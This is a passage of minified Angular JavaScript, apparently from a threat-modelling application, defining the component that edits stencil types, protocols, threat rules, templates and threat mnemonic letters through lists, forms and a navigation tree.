"),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,ght,17,11,"mat-list-item",47),s(16,"\n                "),ne(17,Mht,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),it(23,"app-threat-rule",48),s(24,"\n            "),u(),s(25,"\n          "),u(),s(26,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedProtocol.Name," ",re(9,13,"general.Threats")," "),C(2),at("matTooltip",re(11,15,"general.Add")),C(5),V("ngForOf",e.typeThreats),C(2),V("ngIf",!e.selectedProtocol.IsDefault),C(6),V("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",!0)("canEditName",!0)}}function Aht(t,a){if(1&t){const e=Ye();m(0,"mat-tab-group",12),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(1,"\n    "),m(2,"mat-tab",13),oe(3,"translate"),s(4,"\n        "),ne(5,fht,29,15,"ng-template",14),s(6,"\n    "),u(),s(7,"\n    "),m(8,"mat-tab",13),oe(9,"translate"),s(10,"\n        "),ne(11,vht,27,17,"ng-template",14),s(12,"\n    "),u(),s(13,"\n  "),u()}if(2&t){const e=B(2);V("selectedIndex",e.GetSelectedTabIndex()),C(2),$c("label","",re(3,5,"general.Properties")," (",null==e.selectedProtocol||null==e.selectedProtocol.Properties?null:e.selectedProtocol.Properties.length,")"),C(6),$c("label","",re(9,7,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")")}}function Tht(t,a){if(1&t&&(m(0,"div",25),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.Letter)}}function Eht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedMnemonicLetter=r)}),s(1,"\n            "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n            "),ne(5,Tht,2,1,"div",50),s(6,"\n            "),m(7,"div",25),s(8),u(),s(9,"\n            "),m(10,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(3).DeleteMnemonicLetter(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedMnemonicLetter===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMnemonicLetter===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(5),V("ngIf",e.Letter),C(3),ke(e.Name),C(2),at("matTooltip",re(11,8,"general.Delete"))}}function Dht(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(4).selectedMnemonicLetter.Name="")}),oe(1,"translate"),s(2,"\n                "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n              "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function xht(t,a){if(1&t&&(m(0,"mat-option",63),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e.ID),C(1),ct("\n                    ",e.Name,"\n                  ")}}function wht(t,a){if(1&t&&(m(0,"mat-optgroup",13),s(1,"\n                  "),ne(2,xht,2,3,"mat-option",62),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatCategories)}}function Iht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"div",59),s(3,"\n            "),m(4,"mat-form-field",32),s(5,"\n              "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n              "),m(10,"input",33),he("ngModelChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.Name=n)}),u(),s(11,"\n              "),ne(12,Dht,6,3,"button",34),s(13,"\n            "),u(),s(14,"\n            "),it(15,"br"),s(16,"\n            "),m(17,"mat-form-field",32),s(18,"\n              "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n              "),m(23,"input",33),he("ngModelChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.Letter=n)}),u(),s(24,"\n            "),u(),s(25,"\n            "),it(26,"br"),s(27,"\n            "),m(28,"mat-form-field",10),s(29,"\n              "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n              "),m(34,"input",33),he("ngModelChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.Description=n)}),u(),s(35,"\n            "),u(),s(36,"\n            "),m(37,"mat-form-field",10),s(38,"\n              "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n              "),m(43,"mat-select",60),he("valueChange",function(n){return be(e),Me(B(3).selectedMnemonicLetter.threatCategoryID=n)}),s(44,"\n                "),ne(45,wht,4,2,"mat-optgroup",61),s(46,"\n              "),u(),s(47,"\n            "),u(),s(48,"\n          "),u(),s(49,"\n        "),Mt()}if(2&t){const e=B(3);C(7),ke(re(8,16,"general.Name")),C(3),at("matTooltip",e.selectedMnemonicLetter.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Name),C(2),V("ngIf",e.selectedMnemonicLetter.Name),C(8),ke(re(21,18,"properties.Letter")),C(3),at("matTooltip",e.selectedMnemonicLetter.Letter),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Letter),C(8),ke(re(32,20,"properties.Description")),C(3),at("matTooltip",e.selectedMnemonicLetter.Description),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMnemonicLetter.Description),C(6),ke(re(41,22,"general.ThreatCategory")),C(3),V("value",e.selectedMnemonicLetter.threatCategoryID),C(2),V("ngForOf",e.GetThreatCategoryGroups())}}function Rht(t,a){if(1&t&&(m(0,"th"),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e.Letter)}}function Sht(t,a){if(1&t){const e=Ye();m(0,"td")(1,"mat-checkbox",66),he("change",function(n){const c=be(e).$implicit,d=B().$implicit;return Me(B(4).OnMnemonicElementThreat(n,c,d))}),u()()}if(2&t){const e=a.$implicit,i=B().$implicit;C(1),V("checked",e.AffectedElementTypes.includes(i))}}function kht(t,a){if(1&t&&(m(0,"tr"),s(1,"\n          "),m(2,"td"),s(3),u(),s(4,"\n          "),ne(5,Sht,2,1,"td",65),s(6,"\n        "),u()),2&t){const e=a.$implicit,i=B(4);C(3),ke(i.GetElementTypeName(e)),C(2),V("ngForOf",i.selectedThreatMnemonic.Letters)}}function Pht(t,a){if(1&t&&(m(0,"div",64),s(1,"\n      "),m(2,"table"),s(3,"\n        "),m(4,"tr"),s(5,"\n          "),it(6,"th"),s(7,"\n          "),ne(8,Rht,2,1,"th",65),s(9,"\n        "),u(),s(10,"\n        "),ne(11,kht,7,2,"tr",65),s(12,"\n      "),u(),s(13,"\n    "),u()),2&t){const e=B(3);C(8),V("ngForOf",e.selectedThreatMnemonic.Letters),C(3),V("ngForOf",e.GetMnemonicElementTypes())}}function Oht(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"div",16),s(3,"\n      "),m(4,"div",17),s(5,"\n        "),m(6,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(2);return Me(r.drop(n,r.selectedThreatMnemonic.Letters))}),s(7,"\n          "),m(8,"div",19),s(9),oe(10,"translate"),m(11,"button",20),he("click",function(){return be(e),Me(B(2).AddMnemonicLetter())}),oe(12,"translate"),m(13,"mat-icon"),s(14,"add"),u()()(),s(15,"\n          "),ne(16,Eht,15,10,"mat-list-item",47),s(17,"\n        "),u(),s(18,"\n      "),u(),s(19,"\n      "),m(20,"div",22),s(21,"\n        "),ne(22,Iht,50,24,"ng-container",9),s(23,"\n      "),u(),s(24,"\n    "),u(),s(25,"\n    "),ne(26,Pht,14,2,"div",58),s(27,"\n  "),u()}if(2&t){const e=B(2);C(6),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedThreatMnemonic.Name," ",re(10,10,"properties.Letters")," "),C(2),at("matTooltip",re(12,12,"general.Add")),C(5),V("ngForOf",e.selectedThreatMnemonic.Letters),C(6),V("ngIf",e.selectedMnemonicLetter&&e.selectedThreatMnemonic.Letters.includes(e.selectedMnemonicLetter)),C(4),V("ngIf",(null==e.selectedThreatMnemonic.Letters?null:e.selectedThreatMnemonic.Letters.length)>0)}}function Nht(t,a){if(1&t&&(m(0,"div",5),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,Aut,8,5,"mat-form-field",6),s(6,"\n  "),ne(7,Tut,8,5,"mat-form-field",6),s(8,"\n  "),ne(9,Eut,8,5,"mat-form-field",6),s(10,"\n  "),ne(11,eht,16,10,"mat-tab-group",7),s(12,"\n  "),ne(13,tht,1,1,"app-stencil-type-template",8),s(14,"\n  "),ne(15,Aht,14,9,"mat-tab-group",7),s(16,"\n  "),ne(17,Oht,28,14,"div",9),s(18,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.isStencilType),C(2),V("ngIf",e.isStencilTypeTemplate),C(2),V("ngIf",e.isStencilThreatMnemonic),C(2),V("ngIf",e.isStencilType),C(2),V("ngIf",e.isStencilTypeTemplate),C(2),V("ngIf",e.isProtocol),C(2),V("ngIf",e.isStencilThreatMnemonic)}}function Lht(t,a){if(1&t&&(m(0,"span",69),s(1),oe(2,"translate"),u()),2&t){const e=B(2).item;C(1),ke(re(2,1,e.DisplayName))}}function zht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,Lht,3,3,"span",67),s(3," \n      "),m(4,"button",68),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpProperty(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",68),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownProperty(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function Wht(t,a){if(1&t&&(s(0,"\n    "),ne(1,zht,24,7,"ng-container",9),s(2,"\n  ")),2&t){const e=a.item,i=B();C(1),V("ngIf",i.IsProperty(e))}}let Fht=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.locStorageService=r,this.menuTopLeftPosition={x:"0",y:"0"},i.ConfigChanged.subscribe(c=>{c&&this.createNodes()})}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedProperty=this.selectedThreatRule=null}get isStencilType(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof oM}get selectedType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get selectedElementType(){var e;return null!==(e=this.selectedType)&&void 0!==e&&e.ElementTypeID?this.dataService.Config.GetStencilElementType(this.selectedType):null}get currentPropertyOverwriting(){var e;return null===(e=this.selectedType.PropertyOverwrites)||void 0===e?void 0:e.find(i=>i.Key==this.selectedProperty.ID)}get typeThreats(){return this.selectedType?this.isStencilType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.StencilRestriction)||void 0===i?void 0:i.stencilTypeID)==this.selectedType.ID}):this.isProtocol?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.ProtocolRestriction)||void 0===i?void 0:i.protocolID)==this.selectedProtocol.ID}):void 0:null}get elementTypeThreats(){return this.selectedElementType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.StencilRestriction)||void 0===i?void 0:i.stencilTypeID)==this.selectedElementType.ID}):null}get isTypeThreat(){return!(!this.selectedThreatRule||!this.selectedType)&&this.selectedThreatRule.StencilRestriction.stencilTypeID==this.selectedType.ID}get isStencilTypeTemplate(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof rM}get selectedTypeTemplate(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get isProtocol(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Lu}get selectedProtocol(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get defaultProtocol(){return Lu.GetDefaultType(this.dataService.Config)}get isStencilThreatMnemonic(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof sM}get selectedThreatMnemonic(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}IsProperty(e){return"DisplayName"in e&&"ID"in e}OnMoveUpProperty(e){let i=this.selectedType.Properties;if(0!=i.findIndex(n=>n.ID==e.ID)){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n-1,1)[0])}}OnMoveDownProperty(e){let i=this.selectedType.Properties;if(i.findIndex(n=>n.ID==e.ID)!=i.length-1){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n+1,1)[0])}}GetSelectedTabIndex(){let e=this.locStorageService.Get(si.PAGE_CONFIG_STENCILS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorageService.Set(si.PAGE_CONFIG_STENCILS_TAB_INDEX,e)}AddProperty(){let e=[];e.push(...this.selectedType.Properties.map(n=>n.DisplayName)),!this.selectedType.IsDefault&&this.selectedElementType.Properties&&e.push(...this.selectedElementType.Properties.map(n=>n.DisplayName));let i=Gi.FindUniqueName("New Property",e);this.selectedType.Properties.push({DisplayName:i,ID:Fo(),Tooltip:"",HasGetter:!1,Editable:!0,Type:Ii.CheckBox,DefaultValue:!1}),this.selectedProperty=this.selectedType.Properties[this.selectedType.Properties.length-1]}DeleteProperty(e){let i=this.selectedType.Properties.indexOf(e);i>=0&&this.selectedType.Properties.splice(i,1)}GetElementPropertyValue(e){var i;let n=e.DefaultValue,r=null===(i=this.selectedType.PropertyOverwrites)||void 0===i?void 0:i.find(c=>c.Key==e.ID);return r&&(n=r.Value),e.Type==Ii.ProtocolSelect?r&&(null==n?void 0:n.length)>0?this.dataService.Config.GetProtocols().filter(c=>n.includes(c.ID)).map(c=>c.Name).join(", "):"[ ]":e.Type==Ii.LowMediumHighSelect?An.ToString(n):n}OverwriteProperty(){this.selectedType.PropertyOverwrites||(this.selectedType.PropertyOverwrites=[]),this.selectedType.PropertyOverwrites.push({Key:this.selectedProperty.ID,Value:this.selectedProperty.DefaultValue})}UnOverwriteProperty(){this.selectedType.PropertyOverwrites.splice(this.selectedType.PropertyOverwrites.indexOf(this.selectedType.PropertyOverwrites.find(e=>e.Key==this.selectedProperty.ID)),1)}IsPropOverwritten(e){var i;return null===(i=this.selectedType.PropertyOverwrites)||void 0===i?void 0:i.find(n=>n.Key==e.ID)}GetPropertyTypes(){return bG.GetMappableTypeNames()}AddThreat(){let e;this.isStencilType?(e=this.dataService.Config.CreateThreatRule(this.dataService.Config.StencilThreatRuleGroups,on.Stencil),e.StencilRestriction.stencilTypeID=this.selectedType.ID):(e=this.dataService.Config.CreateThreatRule(this.dataService.Config.StencilThreatRuleGroups,on.Protocol),e.ProtocolRestriction.protocolID=this.selectedProtocol.ID),e.Name=Gi.FindUniqueName(this.selectedType.Name,this.dataService.Config.GetThreatRules().map(i=>i.Name)),this.selectedThreatRule=e}DeleteThreat(e){this.dataService.Config.DeleteThreatRule(e),e==this.selectedThreatRule&&(this.selectedThreatRule=null)}GetStencilRestrictionsCount(e){var i;let n=0;return!(null===(i=e.StencilRestriction)||void 0===i)&&i.DetailRestrictions&&e.StencilRestriction.DetailRestrictions.forEach(r=>{(r.RestType==ya.Property&&r.PropertyRest||r.RestType==ya.PhysicalElement&&r.PhyElementRest)&&(n+=1)}),n}AddTemplateDFD(){const e=this.dataService.Config.CreateStencilTypeTemplate();e.Name=this.selectedType.Name+" Module",e.CanEditInWhichDiagram=!1,e.ListInHWDiagram=!1,e.ListInUCDiagram=!0,e.ListInElementTypeIDs=[];const i=[];i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.LogProcessing&&1==r.IsDefault)),i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.LogDataStore&&1==r.IsDefault)),i.push(this.dataService.Config.GetStencilTypes().find(r=>r.ElementTypeID==Et.PhyTrustArea&&1==r.IsDefault)),e.StencilTypes=i,e.Layout[0].name=this.selectedType.Name+" Handler",e.Layout[0].x=20,e.Layout[0].y=40,e.Layout[1].name=this.selectedType.Name+" Data Storage",e.Layout[1].x=20,e.Layout[1].y=200,e.Layout[2].name=this.selectedType.Name+" Module",e.Layout[2].x=e.Layout[2].y=0,e.Layout[2].width=180,e.Layout[2].height=290,this.selectedType.TemplateDFD=e,this.createNodes();const n=this.selectedType;setTimeout(()=>{this.selectedNode=this.FindNodeOfObject(n)},100)}DeleteTemplate(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Config.DeleteStencilTypeTemplate(e),this.createNodes())})}AddMnemonicLetter(){this.selectedThreatMnemonic.Letters.push({Name:Gi.FindUniqueName("Letter",this.selectedThreatMnemonic.Letters.map(e=>e.Name)),Letter:"",Description:"",AffectedElementTypes:[],threatCategoryID:"",ID:Fo()})}DeleteMnemonicLetter(e){const i=this.selectedThreatMnemonic.Letters.findIndex(n=>n.Name==e.Name&&n.Letter==e.Letter);i>=0&&this.selectedThreatMnemonic.Letters.splice(i,1)}OnMnemonicElementThreat(e,i,n){if(e.checked)i.AffectedElementTypes.push(n);else{const r=i.AffectedElementTypes.indexOf(n);r>=0&&i.AffectedElementTypes.splice(r,1)}}GetMnemonicElementTypes(){return Sc.GetTypes()}GetElementTypeName(e){return Sc.ToString(e)}GetStencilTypes(){let e=this.dataService.Config.GetStencilTypes();return e.sort((i,n)=>n.IsDefault?1:i.ElementTypeID-n.ElementTypeID),e}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetProtocols(){return this.dataService.Config.GetProtocols()}GetIcon(e){return e instanceof Lu?os.Icon:Sc.Icon(e.ElementTypeID)}GetNamesOfIDs(e,i){return e.filter(n=>i.includes(n.ID)).map(n=>n.GetProperty("Name")).join(", ")}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropThreat(e,i){const n=this.dataService.Config.GetThreatRules().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatRules().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatRules(n,r)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,isBold:Y.IsDefault,data:Y,canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilTypes(),Fe=this.dataService.Config.GetStencilTypes().filter(et=>et.ElementTypeID==Y.ElementTypeID),Ne=Fe.findIndex(et=>et.ID==Y.ID);if(0!=Ne){let et=Re.findIndex(ut=>ut.ID==Fe[Ne-1].ID);this.dataService.Config.MoveItemInStencilTypes(Re.findIndex(ut=>ut.ID==Y.ID),et),te.children.splice(Ne,0,te.children.splice(Ne-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilTypes(),Fe=this.dataService.Config.GetStencilTypes().filter(et=>et.ElementTypeID==Y.ElementTypeID),Ne=Fe.findIndex(et=>et.ID==Y.ID);if(Ne!=Fe.length-1){let et=Re.findIndex(ut=>ut.ID==Fe[Ne+1].ID);this.dataService.Config.MoveItemInStencilTypes(Re.findIndex(ut=>ut.ID==Y.ID),et),te.children.splice(Ne,0,te.children.splice(Ne+1,1)[0])}}};return pe.canDelete=pe.canRename=pe.canDuplicate=!Y.IsDefault,pe.canRename&&(pe.onRename=Re=>pe.data.Name=Re),pe.canDelete&&(pe.onDelete=()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilType(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})}),pe.canDuplicate&&(pe.onDuplicate=()=>{let Re=this.dataService.Config.CreateStencilType(Y.ElementTypeID);Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0}),pe},n=(Y,te,pe)=>{let Re={name:()=>Y,canSelect:!1,children:[]};return pe&&(Re.icon=pe),1==te.length?(Re.canAdd=!0,Re.onAdd=()=>{let Fe=this.dataService.Config.CreateStencilType(te[0]);this.createNodes(),this.selectedNode=this.FindNodeOfObject(Fe),this.selectedNode.isRenaming=!0},this.dataService.Config.GetStencilTypes().filter(Fe=>Fe.ElementTypeID==te[0]).forEach(Fe=>{let Ne=i(Fe,Re);Re.children.push(Ne)})):te.forEach(Fe=>{let Ne=n(Sc.ToString(Fe),[Fe]);Re.children.push(Ne)}),Re};this.Nodes.push(n("Processing",[Et.LogProcessing,Et.PhyProcessing],Bp.Icon)),this.Nodes.push(n("Data Store",[Et.LogDataStore,Et.PhyDataStore],Hp.Icon)),this.Nodes.push(n("External Entity",[Et.LogExternalEntity,Et.PhyExternalEntity],Up.Icon)),this.Nodes.push(n("Data Flow",[Et.DataFlow],os.Icon)),this.Nodes.push(n("Physical Link",[Et.PhysicalLink],lf.Icon)),this.Nodes.push(n("Interface",[Et.Interface],Nu.Icon)),this.Nodes.push(n("Trust Area",[Et.LogTrustArea,Et.PhyTrustArea],qp.Icon)),this.Nodes.forEach(Y=>Y.hasMenu=!0);let r={name:()=>"Protocol",canSelect:!1,canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateProtocol();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},c=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,isBold:Y.IsDefault,canRename:!Y.IsDefault,onRename:Re=>pe.data.Name=Re,canDelete:!Y.IsDefault,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteProtocol(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!Y.IsDefault,onDuplicate:()=>{let Re=this.dataService.Config.CreateProtocol();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetProtocols();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);this.dataService.Config.MoveItemInProtocols(Fe,Fe-1),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetProtocols();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);this.dataService.Config.MoveItemInProtocols(Fe,Fe+1),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetProtocols().forEach(Y=>r.children.push(c(Y,r))),this.Nodes.find(Y=>"Data Flow"==Y.name()).children.push(r);let d={name:()=>"Template",canSelect:!1,icon:"view_module",canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateStencilTypeTemplate();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},T=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,canRename:!0,onRename:Re=>pe.data.Name=Re,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilTypeTemplate(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateStencilTypeTemplate();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilTypeTemplates();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilTypeTemplates();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetStencilTypeTemplates().forEach(Y=>d.children.push(T(Y,d))),this.Nodes.push(d);let k={name:()=>"Mnemonic",canSelect:!1,icon:"abc",canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateStencilThreatMnemonic();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},q=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,canRename:!0,onRename:Re=>pe.data.Name=Re,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilThreatMnemonic(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateStencilThreatMnemonic();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilThreatMnemonics();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilThreatMnemonics();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetStencilThreatMnemonics().forEach(Y=>k.children.push(q(Y,k))),this.Nodes.push(k),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-stencils"]],viewQuery:function(e,i){if(1&e&&Mi(vut,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{selectedNode:"selectedNode"},features:[ci],decls:11,vars:6,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],[2,"margin-left","10px","margin-right","10px"],["appearance","fill","style","width: 100%;",4,"ngIf"],[3,"selectedIndex","selectedIndexChange",4,"ngIf"],[3,"selectedTypeTemplate",4,"ngIf"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],[3,"label",4,"ngIf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click","contextmenu",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click","contextmenu"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["style","margin-left: auto; margin-right: 